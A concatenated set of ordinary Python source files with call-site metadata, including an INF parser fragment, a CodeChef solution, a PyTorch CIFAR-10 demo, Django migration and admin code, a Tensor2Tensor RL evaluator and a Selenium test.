def GetHelpString(self):
return self.HelpString
def SetUsage(self, Usage):
self.Usage = Usage
def GetUsage(self):
return self.Usage
##
# HobObject
#
class InfHobObject():
def __init__(self):
self.HobType = ''
self.Usage = ''
self.SupArchList = []
self.HelpString = ''
def SetHobType(self, HobType):
self.HobType = HobType
def GetHobType(self):
return self.HobType
def SetUsage(self, Usage):
self.Usage = Usage
def GetUsage(self):
return self.Usage
def SetSupArchList(self, ArchList):
self.SupArchList = ArchList
def GetSupArchList(self):
return self.SupArchList
def SetHelpString(self, HelpString):
self.HelpString = HelpString
def GetHelpString(self):
return self.HelpString
##
# InfSpecialCommentObject
#
class InfSpecialCommentObject(InfSectionCommonDef):
def __init__(self):
self.SpecialComments = Sdict()
InfSectionCommonDef.__init__(self)
def SetSpecialComments(self, SepcialSectionList = None, Type = ''):
if Type == DT.TYPE_HOB_SECTION or \
Type == DT.TYPE_EVENT_SECTION or \
Type == DT.TYPE_BOOTMODE_SECTION:
for Item in SepcialSectionList:
if Type in self.SpecialComments:
ObjList = self.SpecialComments[Type]
ObjList.append(Item)
self.SpecialComments[Type] = ObjList
else:
ObjList = []
ObjList.append(Item)
self.SpecialComments[Type] = ObjList
return True
def GetSpecialComments(self):
return self.SpecialComments
## ErrorInInf
#
# An encapsulate of Error for INF parser.
#
def ErrorInInf(Message=None, ErrorCode=None, LineInfo=None, RaiseError=True):
if ErrorCode is None:
ErrorCode = ToolError.FORMAT_INVALID
if LineInfo is None:
LineInfo = ['', -1, '']
Logger.Error("InfParser",
ErrorCode,
Message=Message,
File=LineInfo[0],
Line=LineInfo[1],
ExtraData=LineInfo[2],
RaiseError=RaiseError)
| [((136, 4, 142, 39), 'Logger.Log.Error', 'Logger.Error', (), '', True, 'import Logger.Log as Logger\n'), ((103, 31, 103, 38), 'Library.Misc.Sdict', 'Sdict', ({}, {}), '()', False, 'from Library.Misc import Sdict\n'), ((104, 8, 104, 42), 'Object.Parser.InfCommonObject.InfSectionCommonDef.__init__', 'InfSectionCommonDef.__init__', ({(104, 37, 104, 41): 'self'}, {}), '(self)', False, 'from Object.Parser.InfCommonObject import InfSectionCommonDef\n')] |
allenalvin333/Codechef_Competitions | 21-08/Starters8/1.py | 44c3626de33cd9e17d1acfc74abe0aab809efbad | # https://www.codechef.com/START8C/problems/PENALTY
for T in range(int(input())):
n=list(map(int,input().split()))
a=b=0
for i in range(len(n)):
if(n[i]==1):
if(i%2==0): a+=1
else: b+=1
if(a>b): print(1)
elif(b>a): print(2)
else: print(0) | [] |
jhong93/vpd | util/eval.py | 1ed3e8631c46e078ecb9a7756dba1f1c14aead5b | import matplotlib.pyplot as plt
from sklearn.metrics import ConfusionMatrixDisplay, confusion_matrix
def save_confusion_matrix(truth, pred, out_file, norm=None):
label_names = list(set(truth) | set(pred))
label_names.sort()
truth_compact = [label_names.index(x) for x in truth]
pred_compact = [label_names.index(x) for x in pred]
cm = confusion_matrix(
truth_compact, pred_compact, labels=list(range(len(label_names))),
normalize=norm)
if norm is not None:
cm *= 100
fig = plt.figure(figsize=(20, 20))
ax = fig.add_subplot(111)
disp = ConfusionMatrixDisplay(
confusion_matrix=cm, display_labels=label_names)
disp.plot(ax=ax, xticks_rotation='vertical',
values_format='.1f' if norm is not None else 'd')
plt.tight_layout()
plt.savefig(out_file)
plt.close(fig)
| [((15, 10, 15, 38), 'matplotlib.pyplot.figure', 'plt.figure', (), '', True, 'import matplotlib.pyplot as plt\n'), ((17, 11, 18, 56), 'sklearn.metrics.ConfusionMatrixDisplay', 'ConfusionMatrixDisplay', (), '', False, 'from sklearn.metrics import ConfusionMatrixDisplay, confusion_matrix\n'), ((21, 4, 21, 22), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((22, 4, 22, 25), 'matplotlib.pyplot.savefig', 'plt.savefig', ({(22, 16, 22, 24): 'out_file'}, {}), '(out_file)', True, 'import matplotlib.pyplot as plt\n'), ((23, 4, 23, 18), 'matplotlib.pyplot.close', 'plt.close', ({(23, 14, 23, 17): 'fig'}, {}), '(fig)', True, 'import matplotlib.pyplot as plt\n')] |
sillyemperor/langstudy | python/py3study/pytorch-lab/demo-cifar.py | 937a11d97984e10e4ead54f3b7b7d6a1f2ef24a1 | import torch
import torchvision
import torchvision.transforms as transforms
import os.path
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
transform = transforms.Compose(
[transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
root = os.path.join(BASE_DIR, '../data/')
trainset = torchvision.datasets.CIFAR10(root=root, train=True,
download=True, transform=transform)
trainloader = torch.utils.data.DataLoader(trainset,
shuffle=True, num_workers=2)
testset = torchvision.datasets.CIFAR10(root=root, train=False,
download=True, transform=transform)
testloader = torch.utils.data.DataLoader(testset,
shuffle=False, num_workers=2)
import torch.nn as nn
import torch.nn.functional as F
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(3, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 16, 5)
self.fc1 = nn.Linear(16 * 5 * 5, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
# print(x.shape)
x = self.pool(F.relu(self.conv1(x)))
# print(x.shape)
x = self.pool(F.relu(self.conv2(x)))
# print(x.shape)
x = x.view(-1, 16 * 5 * 5)
# print(x.shape)
x = F.relu(self.fc1(x))
# print(x.shape)
x = F.relu(self.fc2(x))
# print(x.shape)
x = self.fc3(x)
# print(x.shape)
return x
# torch.Size([1, 3, 32, 32])
# torch.Size([1, 6, 14, 14])
# torch.Size([1, 16, 5, 5])
# torch.Size([1, 400])
# torch.Size([1, 120])
# torch.Size([1, 84])
# torch.Size([1, 100])
model = Net()
import torch.optim as optim
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(model.parameters(), lr=0.0002, momentum=0.9)
from util import train_eval
train_eval(model, criterion, trainloader, testloader, optimizer, epochs=5)
# [1, 5000] loss: 2.293
# [1, 10000] loss: 2.075
# [1, 15000] loss: 1.876
# [1, 20000] loss: 1.754
# [1, 25000] loss: 1.658
# [1, 30000] loss: 1.625
# [1, 35000] loss: 1.558
# [1, 40000] loss: 1.520
# [1, 45000] loss: 1.494
# [1, 50000] loss: 1.459
# 1/5 4456/10000 44.56% (107.18255376815796s)
# [2, 5000] loss: 1.413
# [2, 10000] loss: 1.398
# [2, 15000] loss: 1.386
# [2, 20000] loss: 1.379
# [2, 25000] loss: 1.358
# [2, 30000] loss: 1.324
# [2, 35000] loss: 1.333
# [2, 40000] loss: 1.280
# [2, 45000] loss: 1.296
# [2, 50000] loss: 1.304
# 2/5 5357/10000 53.56999999999999% (105.8866639137268s)
# [3, 5000] loss: 1.226
# [3, 10000] loss: 1.231
# [3, 15000] loss: 1.215
# [3, 20000] loss: 1.235
# [3, 25000] loss: 1.199
# [3, 30000] loss: 1.187
# [3, 35000] loss: 1.192
# [3, 40000] loss: 1.194
# [3, 45000] loss: 1.196
# [3, 50000] loss: 1.191
# 3/5 5729/10000 57.29% (105.63971090316772s)
# [4, 5000] loss: 1.117
# [4, 10000] loss: 1.096
# [4, 15000] loss: 1.121
# [4, 20000] loss: 1.123
# [4, 25000] loss: 1.107
# [4, 30000] loss: 1.120
# [4, 35000] loss: 1.124
# [4, 40000] loss: 1.094
# [4, 45000] loss: 1.105
# [4, 50000] loss: 1.102
# 4/5 5829/10000 58.29% (112.56915497779846s)
# [5, 5000] loss: 1.034
# [5, 10000] loss: 1.024
# [5, 15000] loss: 1.040
# [5, 20000] loss: 1.027
# [5, 25000] loss: 1.043
# [5, 30000] loss: 1.049
# [5, 35000] loss: 1.024
# [5, 40000] loss: 1.042
# [5, 45000] loss: 1.027
# [5, 50000] loss: 1.027
# 5/5 6178/10000 61.78% (109.75669193267822s)
# 61.0% (541.0347754955292s)
| [((12, 11, 13, 75), 'torchvision.datasets.CIFAR10', 'torchvision.datasets.CIFAR10', (), '', False, 'import torchvision\n'), ((14, 14, 15, 70), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (), '', False, 'import torch\n'), ((17, 10, 18, 74), 'torchvision.datasets.CIFAR10', 'torchvision.datasets.CIFAR10', (), '', False, 'import torchvision\n'), ((19, 13, 20, 70), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (), '', False, 'import torch\n'), ((63, 12, 63, 33), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ({}, {}), '()', True, 'import torch.nn as nn\n'), ((69, 0, 69, 74), 'util.train_eval', 'train_eval', (), '', False, 'from util import train_eval\n'), ((8, 5, 8, 26), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ({}, {}), '()', True, 'import torchvision.transforms as transforms\n'), ((9, 5, 9, 59), 'torchvision.transforms.Normalize', 'transforms.Normalize', ({(9, 26, 9, 41): '(0.5, 0.5, 0.5)', (9, 43, 9, 58): '(0.5, 0.5, 0.5)'}, {}), '((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))', True, 'import torchvision.transforms as transforms\n'), ((29, 21, 29, 39), 'torch.nn.Conv2d', 'nn.Conv2d', ({(29, 31, 29, 32): '3', (29, 34, 29, 35): '6', (29, 37, 29, 38): '5'}, {}), '(3, 6, 5)', True, 'import torch.nn as nn\n'), ((30, 20, 30, 38), 'torch.nn.MaxPool2d', 'nn.MaxPool2d', ({(30, 33, 30, 34): '2', (30, 36, 30, 37): '2'}, {}), '(2, 2)', True, 'import torch.nn as nn\n'), ((31, 21, 31, 40), 'torch.nn.Conv2d', 'nn.Conv2d', ({(31, 31, 31, 32): '6', (31, 34, 31, 36): '16', (31, 38, 31, 39): '5'}, {}), '(6, 16, 5)', True, 'import torch.nn as nn\n'), ((32, 19, 32, 45), 'torch.nn.Linear', 'nn.Linear', ({(32, 29, 32, 39): '16 * 5 * 5', (32, 41, 32, 44): '120'}, {}), '(16 * 5 * 5, 120)', True, 'import torch.nn as nn\n'), ((33, 19, 33, 37), 'torch.nn.Linear', 'nn.Linear', ({(33, 29, 33, 32): '120', (33, 34, 33, 36): '84'}, {}), '(120, 84)', True, 'import torch.nn as nn\n'), ((34, 19, 34, 36), 'torch.nn.Linear', 'nn.Linear', ({(34, 29, 34, 31): '84', (34, 33, 34, 35): '10'}, {}), '(84, 10)', True, 'import torch.nn as nn\n')] |
B612-Asteroid-Institute/astroquery | astroquery/neodys/tests/test_neodys_remote.py | 4bc8002639e80f7356306f4e000334da5e086091 |
from ... import neodys
def test_neodys_query():
test_object = "2018VP1"
res_kep_0 = neodys.core.NEODyS.query_object(
test_object, orbital_element_type="ke", epoch_near_present=0)
res_kep_1 = neodys.core.NEODyS.query_object(
test_object, orbital_element_type="ke", epoch_near_present=1)
res_eq_0 = neodys.core.NEODyS.query_object(
test_object, orbital_element_type="eq", epoch_near_present=0)
res_eq_1 = neodys.core.NEODyS.query_object(
test_object, orbital_element_type="eq", epoch_near_present=1)
assert len(res_kep_0['Keplerian State Vector']) == 6
assert len(res_kep_0['Covariance Matrix']) == 21
assert res_kep_0['Mean Julian Date'][0] != res_kep_1['Mean Julian Date'][0]
assert len(res_eq_0['Equinoctial State Vector']) == 6
assert len(res_eq_0['Covariance Matrix']) == 21
assert len(res_eq_0['Keplerian Correlation Matrix']) == 0
assert res_eq_0['Mean Julian Date'][0] != res_eq_1['Mean Julian Date'][0]
| [] |
kkrampa/commcare-hq | corehq/apps/accounting/migrations/0026_auto_20180508_1956.py | d64d7cad98b240325ad669ccc7effb07721b4d44 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.13 on 2018-05-08 19:56
from __future__ import unicode_literals
from __future__ import absolute_import
from django.db import migrations
def noop(*args, **kwargs):
pass
def _convert_emailed_to_array_field(apps, schema_editor):
BillingRecord = apps.get_model('accounting', 'BillingRecord')
for record in BillingRecord.objects.all():
if record.emailed_to != '':
record.emailed_to_list = record.emailed_to.split(',')
record.save()
WireBillingRecord = apps.get_model('accounting', 'WireBillingRecord')
for wirerecord in WireBillingRecord.objects.all():
if wirerecord.emailed_to != '':
wirerecord.emailed_to_list = wirerecord.emailed_to.split(',')
wirerecord.save()
class Migration(migrations.Migration):
dependencies = [
('accounting', '0025_auto_20180508_1952'),
]
operations = [
migrations.RunPython(_convert_emailed_to_array_field, reverse_code=noop)
]
| [((35, 8, 35, 80), 'django.db.migrations.RunPython', 'migrations.RunPython', (), '', False, 'from django.db import migrations\n')] |
SouBanerjee/tensor2tensor | tensor2tensor/rl/evaluator.py | 8b88b13dd65bf52b3c27663a128adb7b0a5773fb | # coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Evaluation script for RL agents.
Example invocation:
python -m tensor2tensor.rl.evaluator \
--policy_dir=$HOME/t2t/rl_v1/policy \
--eval_metrics_dir=$HOME/t2t/rl_v1/full_eval_metrics \
--hparams_set=rlmb_base \
--hparams='batch_size=64'
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import os
from tensor2tensor.data_generators import gym_env
from tensor2tensor.layers import common_video
from tensor2tensor.models.research import rl # pylint: disable=unused-import
from tensor2tensor.rl import rl_utils
from tensor2tensor.rl import trainer_model_based_params # pylint: disable=unused-import
from tensor2tensor.utils import flags as t2t_flags # pylint: disable=unused-import
from tensor2tensor.utils import registry
from tensor2tensor.utils import trainer_lib
import tensorflow as tf
flags = tf.flags
FLAGS = flags.FLAGS
flags.DEFINE_string("output_dir", "", "Main directory for multi-runs.")
flags.DEFINE_integer("total_num_workers", 1, "How many workers in total.")
flags.DEFINE_string("worker_to_game_map", "", "How to map workers to games.")
flags.DEFINE_string("policy_dir", "", "Directory with policy checkpoints.")
flags.DEFINE_string("model_dir", "", "Directory with model checkpoints.")
flags.DEFINE_string(
"eval_metrics_dir", "", "Directory to output the eval metrics at."
)
flags.DEFINE_bool("full_eval", True, "Whether to ignore the timestep limit.")
flags.DEFINE_enum(
"agent", "policy", ["random", "policy", "planner"], "Agent type to use."
)
flags.DEFINE_bool(
"eval_with_learner", True,
"Whether to use the PolicyLearner.evaluate function instead of an "
"out-of-graph one. Works only with --agent=policy."
)
flags.DEFINE_string(
"planner_hparams_set", "planner_small", "Planner hparam set."
)
flags.DEFINE_string("planner_hparams", "", "Planner hparam overrides.")
flags.DEFINE_integer(
"log_every_steps", 20, "Log every how many environment steps."
)
flags.DEFINE_string(
"debug_video_path", "", "Path to save the planner debug video at."
)
# Unused flags needed to pass for multi-run infrastructure.
flags.DEFINE_bool("autotune", False, "Unused here.")
flags.DEFINE_string("objective", "", "Unused here.")
flags.DEFINE_string("client_handle", "client_0", "Unused.")
flags.DEFINE_bool("maximize_tuner_objective", True, "Unused.")
flags.DEFINE_integer("vizier_search_algorithm", 0, "Unused.")
@registry.register_hparams
def planner_tiny():
return tf.contrib.training.HParams(
num_rollouts=1,
planning_horizon=2,
rollout_agent_type="random",
batch_size=1,
env_type="simulated",
)
@registry.register_hparams
def planner_small():
return tf.contrib.training.HParams(
num_rollouts=64,
planning_horizon=16,
rollout_agent_type="policy",
batch_size=64,
env_type="simulated",
)
def make_env(env_type, real_env, sim_env_kwargs):
"""Factory function for envs."""
return {
"real": lambda: real_env.new_like( # pylint: disable=g-long-lambda
batch_size=sim_env_kwargs["batch_size"],
store_rollouts=False,
),
"simulated": lambda: rl_utils.SimulatedBatchGymEnvWithFixedInitialFrames( # pylint: disable=g-long-lambda
**sim_env_kwargs
),
}[env_type]()
def make_agent(
agent_type, env, policy_hparams, policy_dir, sampling_temp,
sim_env_kwargs=None, frame_stack_size=None, planning_horizon=None,
rollout_agent_type=None, batch_size=None, num_rollouts=None,
inner_batch_size=None, video_writer=None, env_type=None):
"""Factory function for Agents."""
if batch_size is None:
batch_size = env.batch_size
return {
"random": lambda: rl_utils.RandomAgent( # pylint: disable=g-long-lambda
batch_size, env.observation_space, env.action_space
),
"policy": lambda: rl_utils.PolicyAgent( # pylint: disable=g-long-lambda
batch_size, env.observation_space, env.action_space,
policy_hparams, policy_dir, sampling_temp
),
"planner": lambda: rl_utils.PlannerAgent( # pylint: disable=g-long-lambda
batch_size, make_agent(
rollout_agent_type, env, policy_hparams, policy_dir,
sampling_temp, batch_size=inner_batch_size
), make_env(env_type, env.env, sim_env_kwargs),
lambda env: rl_utils.BatchStackWrapper(env, frame_stack_size),
num_rollouts, planning_horizon,
discount_factor=policy_hparams.gae_gamma, video_writer=video_writer
),
}[agent_type]()
def make_eval_fn_with_agent(
agent_type, planner_hparams, model_dir, log_every_steps=None,
video_writer=None
):
"""Returns an out-of-graph eval_fn using the Agent API."""
def eval_fn(env, loop_hparams, policy_hparams, policy_dir, sampling_temp):
"""Eval function."""
base_env = env
env = rl_utils.BatchStackWrapper(env, loop_hparams.frame_stack_size)
sim_env_kwargs = rl.make_simulated_env_kwargs(
base_env, loop_hparams, batch_size=planner_hparams.batch_size,
model_dir=model_dir
)
agent = make_agent(
agent_type, env, policy_hparams, policy_dir, sampling_temp,
sim_env_kwargs, loop_hparams.frame_stack_size,
planner_hparams.planning_horizon, planner_hparams.rollout_agent_type,
num_rollouts=planner_hparams.num_rollouts,
inner_batch_size=planner_hparams.batch_size, video_writer=video_writer,
env_type=planner_hparams.env_type
)
rl_utils.run_rollouts(
env, agent, env.reset(), log_every_steps=log_every_steps
)
assert len(base_env.current_epoch_rollouts()) == env.batch_size
return eval_fn
def evaluate(
loop_hparams, planner_hparams, policy_dir, model_dir, eval_metrics_dir,
agent_type, eval_with_learner, log_every_steps, debug_video_path,
report_fn=None, report_metric=None
):
"""Evaluate."""
if eval_with_learner:
assert agent_type == "policy"
if report_fn:
assert report_metric is not None
eval_metrics_writer = tf.summary.FileWriter(eval_metrics_dir)
video_writer = None
kwargs = {}
if not eval_with_learner:
if debug_video_path:
video_writer = common_video.WholeVideoWriter(
fps=10, output_path=debug_video_path, file_format="avi")
kwargs["eval_fn"] = make_eval_fn_with_agent(
agent_type, planner_hparams, model_dir, log_every_steps=log_every_steps,
video_writer=video_writer
)
eval_metrics = rl_utils.evaluate_all_configs(
loop_hparams, policy_dir, **kwargs
)
rl_utils.summarize_metrics(eval_metrics_writer, eval_metrics, 0)
if video_writer is not None:
video_writer.finish_to_disk()
# Report metrics
if report_fn:
if report_metric == "mean_reward":
metric_name = rl_utils.get_metric_name(
sampling_temp=loop_hparams.eval_sampling_temps[0],
max_num_noops=loop_hparams.eval_max_num_noops,
clipped=False
)
report_fn(eval_metrics[metric_name], 0)
else:
report_fn(eval_metrics[report_metric], 0)
return eval_metrics
def get_game_for_worker(map_name, directory_id):
"""Get game for the given worker (directory) id."""
if map_name == "v100unfriendly":
games = ["chopper_command", "boxing", "asterix", "seaquest"]
worker_per_game = 5
elif map_name == "human_nice":
games = gym_env.ATARI_GAMES_WITH_HUMAN_SCORE_NICE
worker_per_game = 5
else:
raise ValueError("Unknown worker to game map name: %s" % map_name)
games.sort()
game_id = (directory_id - 1) // worker_per_game
tf.logging.info("Getting game %d from %s." % (game_id, games))
return games[game_id]
def main(_):
now = datetime.datetime.now()
now_tag = now.strftime("%Y_%m_%d_%H_%M")
loop_hparams = trainer_lib.create_hparams(
FLAGS.loop_hparams_set, FLAGS.loop_hparams
)
if FLAGS.worker_to_game_map and FLAGS.total_num_workers > 1:
loop_hparams.game = get_game_for_worker(
FLAGS.worker_to_game_map, FLAGS.worker_id + 1)
tf.logging.info("Set game to %s." % loop_hparams.game)
if FLAGS.full_eval:
loop_hparams.eval_rl_env_max_episode_steps = -1
planner_hparams = trainer_lib.create_hparams(
FLAGS.planner_hparams_set, FLAGS.planner_hparams
)
policy_dir = FLAGS.policy_dir
model_dir = FLAGS.model_dir
eval_metrics_dir = FLAGS.eval_metrics_dir
if FLAGS.output_dir:
cur_dir = FLAGS.output_dir
if FLAGS.total_num_workers > 1:
cur_dir = os.path.join(cur_dir, "%d" % (FLAGS.worker_id + 1))
policy_dir = os.path.join(cur_dir, "policy")
model_dir = os.path.join(cur_dir, "world_model")
eval_metrics_dir = os.path.join(cur_dir, "evaluator_" + now_tag)
tf.logging.info("Writing metrics to %s." % eval_metrics_dir)
if not tf.gfile.Exists(eval_metrics_dir):
tf.gfile.MkDir(eval_metrics_dir)
evaluate(
loop_hparams, planner_hparams, policy_dir, model_dir,
eval_metrics_dir, FLAGS.agent, FLAGS.eval_with_learner,
FLAGS.log_every_steps if FLAGS.log_every_steps > 0 else None,
debug_video_path=FLAGS.debug_video_path
)
if __name__ == "__main__":
tf.logging.set_verbosity(tf.logging.INFO)
tf.app.run()
| [((87, 9, 93, 3), 'tensorflow.contrib.training.HParams', 'tf.contrib.training.HParams', (), '', True, 'import tensorflow as tf\n'), ((98, 9, 104, 3), 'tensorflow.contrib.training.HParams', 'tf.contrib.training.HParams', (), '', True, 'import tensorflow as tf\n'), ((188, 24, 188, 63), 'tensorflow.summary.FileWriter', 'tf.summary.FileWriter', ({(188, 46, 188, 62): 'eval_metrics_dir'}, {}), '(eval_metrics_dir)', True, 'import tensorflow as tf\n'), ((199, 17, 201, 3), 'tensor2tensor.rl.rl_utils.evaluate_all_configs', 'rl_utils.evaluate_all_configs', ({(200, 6, 200, 18): 'loop_hparams', (200, 20, 200, 30): 'policy_dir'}, {}), '(loop_hparams, policy_dir, **kwargs)', False, 'from tensor2tensor.rl import rl_utils\n'), ((202, 2, 202, 66), 'tensor2tensor.rl.rl_utils.summarize_metrics', 'rl_utils.summarize_metrics', ({(202, 29, 202, 48): 'eval_metrics_writer', (202, 50, 202, 62): 'eval_metrics', (202, 64, 202, 65): '(0)'}, {}), '(eval_metrics_writer, eval_metrics, 0)', False, 'from tensor2tensor.rl import rl_utils\n'), ((233, 2, 233, 64), 'tensorflow.logging.info', 'tf.logging.info', ({(233, 18, 233, 63): "('Getting game %d from %s.' % (game_id, games))"}, {}), "('Getting game %d from %s.' % (game_id, games))", True, 'import tensorflow as tf\n'), ((238, 8, 238, 31), 'datetime.datetime.now', 'datetime.datetime.now', ({}, {}), '()', False, 'import datetime\n'), ((240, 17, 242, 3), 'tensor2tensor.utils.trainer_lib.create_hparams', 'trainer_lib.create_hparams', ({(241, 6, 241, 28): 'FLAGS.loop_hparams_set', (241, 30, 241, 48): 'FLAGS.loop_hparams'}, {}), '(FLAGS.loop_hparams_set, FLAGS.loop_hparams)', False, 'from tensor2tensor.utils import trainer_lib\n'), ((249, 20, 251, 3), 'tensor2tensor.utils.trainer_lib.create_hparams', 'trainer_lib.create_hparams', ({(250, 6, 250, 31): 'FLAGS.planner_hparams_set', (250, 33, 250, 54): 'FLAGS.planner_hparams'}, {}), '(FLAGS.planner_hparams_set, FLAGS.planner_hparams)', False, 'from tensor2tensor.utils import trainer_lib\n'), ((274, 2, 274, 43), 'tensorflow.logging.set_verbosity', 'tf.logging.set_verbosity', ({(274, 27, 274, 42): 'tf.logging.INFO'}, {}), '(tf.logging.INFO)', True, 'import tensorflow as tf\n'), ((275, 2, 275, 14), 'tensorflow.app.run', 'tf.app.run', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((156, 10, 156, 72), 'tensor2tensor.rl.rl_utils.BatchStackWrapper', 'rl_utils.BatchStackWrapper', ({(156, 37, 156, 40): 'env', (156, 42, 156, 71): 'loop_hparams.frame_stack_size'}, {}), '(env, loop_hparams.frame_stack_size)', False, 'from tensor2tensor.rl import rl_utils\n'), ((157, 21, 160, 5), 'tensor2tensor.models.research.rl.make_simulated_env_kwargs', 'rl.make_simulated_env_kwargs', (), '', False, 'from tensor2tensor.models.research import rl\n'), ((246, 4, 246, 58), 'tensorflow.logging.info', 'tf.logging.info', ({(246, 20, 246, 57): "('Set game to %s.' % loop_hparams.game)"}, {}), "('Set game to %s.' % loop_hparams.game)", True, 'import tensorflow as tf\n'), ((259, 17, 259, 48), 'os.path.join', 'os.path.join', ({(259, 30, 259, 37): 'cur_dir', (259, 39, 259, 47): '"""policy"""'}, {}), "(cur_dir, 'policy')", False, 'import os\n'), ((260, 16, 260, 52), 'os.path.join', 'os.path.join', ({(260, 29, 260, 36): 'cur_dir', (260, 38, 260, 51): '"""world_model"""'}, {}), "(cur_dir, 'world_model')", False, 'import os\n'), ((261, 23, 261, 68), 'os.path.join', 'os.path.join', ({(261, 36, 261, 43): 'cur_dir', (261, 45, 261, 67): "'evaluator_' + now_tag"}, {}), "(cur_dir, 'evaluator_' + now_tag)", False, 'import os\n'), ((262, 4, 262, 64), 'tensorflow.logging.info', 'tf.logging.info', ({(262, 20, 262, 63): "('Writing metrics to %s.' % eval_metrics_dir)"}, {}), "('Writing metrics to %s.' % eval_metrics_dir)", True, 'import tensorflow as tf\n'), ((193, 21, 194, 66), 'tensor2tensor.layers.common_video.WholeVideoWriter', 'common_video.WholeVideoWriter', (), '', False, 'from tensor2tensor.layers import common_video\n'), ((210, 20, 214, 7), 'tensor2tensor.rl.rl_utils.get_metric_name', 'rl_utils.get_metric_name', (), '', False, 'from tensor2tensor.rl import rl_utils\n'), ((258, 16, 258, 67), 'os.path.join', 'os.path.join', ({(258, 29, 258, 36): 'cur_dir', (258, 38, 258, 66): "'%d' % (FLAGS.worker_id + 1)"}, {}), "(cur_dir, '%d' % (FLAGS.worker_id + 1))", False, 'import os\n'), ((263, 11, 263, 44), 'tensorflow.gfile.Exists', 'tf.gfile.Exists', ({(263, 27, 263, 43): 'eval_metrics_dir'}, {}), '(eval_metrics_dir)', True, 'import tensorflow as tf\n'), ((264, 6, 264, 38), 'tensorflow.gfile.MkDir', 'tf.gfile.MkDir', ({(264, 21, 264, 37): 'eval_metrics_dir'}, {}), '(eval_metrics_dir)', True, 'import tensorflow as tf\n'), ((114, 27, 116, 7), 'tensor2tensor.rl.rl_utils.SimulatedBatchGymEnvWithFixedInitialFrames', 'rl_utils.SimulatedBatchGymEnvWithFixedInitialFrames', ({}, {}), '(**sim_env_kwargs)', False, 'from tensor2tensor.rl import rl_utils\n'), ((129, 24, 131, 7), 'tensor2tensor.rl.rl_utils.RandomAgent', 'rl_utils.RandomAgent', ({(130, 10, 130, 20): 'batch_size', (130, 22, 130, 43): 'env.observation_space', (130, 45, 130, 61): 'env.action_space'}, {}), '(batch_size, env.observation_space, env.action_space)', False, 'from tensor2tensor.rl import rl_utils\n'), ((132, 24, 135, 7), 'tensor2tensor.rl.rl_utils.PolicyAgent', 'rl_utils.PolicyAgent', ({(133, 10, 133, 20): 'batch_size', (133, 22, 133, 43): 'env.observation_space', (133, 45, 133, 61): 'env.action_space', (134, 10, 134, 24): 'policy_hparams', (134, 26, 134, 36): 'policy_dir', (134, 38, 134, 51): 'sampling_temp'}, {}), '(batch_size, env.observation_space, env.action_space,\n policy_hparams, policy_dir, sampling_temp)', False, 'from tensor2tensor.rl import rl_utils\n'), ((141, 22, 141, 71), 'tensor2tensor.rl.rl_utils.BatchStackWrapper', 'rl_utils.BatchStackWrapper', ({(141, 49, 141, 52): 'env', (141, 54, 141, 70): 'frame_stack_size'}, {}), '(env, frame_stack_size)', False, 'from tensor2tensor.rl import rl_utils\n')] |
AndreiHustiuc/IT_Factory_Course | src/part_2_automation/test_test1.py | c6f3e4a9282a1c19c0f52c79f0c81f026814a02a | # Generated by Selenium IDE
import pytest
import time
import json
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
class TestTest1():
def setup_method(self, method):
self.driver = webdriver.Chrome()
self.vars = {}
def teardown_method(self, method):
self.driver.quit()
def test_test1(self):
self.driver.get("https://www.wikipedia.org/")
self.driver.set_window_size(1920, 1040)
self.driver.find_element(By.ID, "searchInput").click()
self.driver.find_element(By.ID, "searchInput").send_keys("Romania")
self.driver.find_element(By.ID, "searchInput").send_keys(Keys.ENTER)
self.driver.find_element(By.CSS_SELECTOR, ".tocsection-21 .toctext").click()
self.driver.execute_script("window.scrollTo(0,10634)")
self.driver.find_element(By.CSS_SELECTOR, ".thumb:nth-child(30) .thumbimage").click()
self.driver.execute_script("window.scrollTo(0,0)")
| [((15, 18, 15, 36), 'selenium.webdriver.Chrome', 'webdriver.Chrome', ({}, {}), '()', False, 'from selenium import webdriver\n')] |
njmhendrix/grand-challenge.org | app/grandchallenge/components/admin.py | 9bc36f5e26561a78bd405e8ea5e4c0f86c95f011 | from django.contrib import admin
from grandchallenge.components.models import (
ComponentInterface,
ComponentInterfaceValue,
)
class ComponentInterfaceAdmin(admin.ModelAdmin):
list_display = (
"pk",
"title",
"slug",
"kind",
"default_value",
"relative_path",
)
readonly_fields = (
"default_value",
"relative_path",
)
class ComponentInterfaceValueAdmin(admin.ModelAdmin):
list_display = ("pk", "interface", "value", "file", "image")
readonly_fields = ("interface", "value", "file", "image")
admin.site.register(ComponentInterface, ComponentInterfaceAdmin)
admin.site.register(ComponentInterfaceValue, ComponentInterfaceValueAdmin)
